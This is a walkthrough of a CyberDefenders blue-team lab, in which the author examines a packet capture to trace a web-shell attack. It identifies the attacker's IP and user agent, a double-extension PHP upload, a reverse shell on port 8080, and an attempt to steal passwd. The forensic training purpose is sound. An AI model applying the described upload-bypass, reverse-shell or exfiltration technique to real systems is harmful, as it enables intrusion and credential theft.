WebStrike | CyberDefenders Lab Walkthrough
Solvenite
Introduction:
Hey everyone! Been a while since I posted a writeup on here. I was super busy with university and stuff but now i’m going to go back to writing CTF write ups!
Here’s the link to the lab: https://cyberdefenders.org/blueteam-ctf-challenges/webstrike/
Q1- Understanding the geographical origin of the attack aids in geo-blocking measures and threat intelligence analysis. What city did the attack originate from?
Start off by opening the Pcap file. We find that that the Source IP that sends the most requests is 117.11.88.124, which is a pretty good indicator of malicious behaviour.
Searching this address on WhatIsMyIPAddress gives us the answer to our first question.
Answer: Tianjin
Q2-Knowing the attacker’s user-agent assists in creating robust filtering rules. What’s the attacker’s user agent?
We use the filter http.request.method == “GET” to get the User Agent. Then just inspect the Packet Details Pane to find the header.
Answer: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Q3-We need to identify if there were potential vulnerabilities exploited. What’s the name of the malicious web shell uploaded?
To find a malicious web shell upload, search for packets that have source IP =117.11.88.124 using HTTP with POST method.
This is because uploads use the POST method to actually paste the file with the exploit it. Filtering with the post method streamlines our packets, so we can search for the upload easily.
Answer: image.jpg.php
Q4-Knowing the directory where files uploaded are stored is important for reinforcing defences against unauthorized access. Which directory is used by the website to store the uploaded files?
Since we already have the name of the malicious script , searching for it helps us follow it’s execution.
It’s also quite obvious that the /uploads/ subdomain is where the attacker would try to upload the script first ’cause it’s the uploads section.
Answer: /reviews/uploads/
Q5-Identifying the port utilized by the web shell helps improve firewall configurations for blocking unauthorized outbound traffic. What port was used by the malicious web shell?
To find this, go back to the POST method that has the upload in it. The script is visible along with the nc listening IP and port used by the attacker.
Answer: 8080
Q6-Understanding the value of compromised data assists in prioritizing incident response actions. What file was the attacker trying to exfiltrate?
To see this response, find the packet that has the source IP 24.49.63.79 and destination IP 117.11.88.124 using the POST method
Answer: passwd
Subscribe to my newsletter
Read articles from Solvenite directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by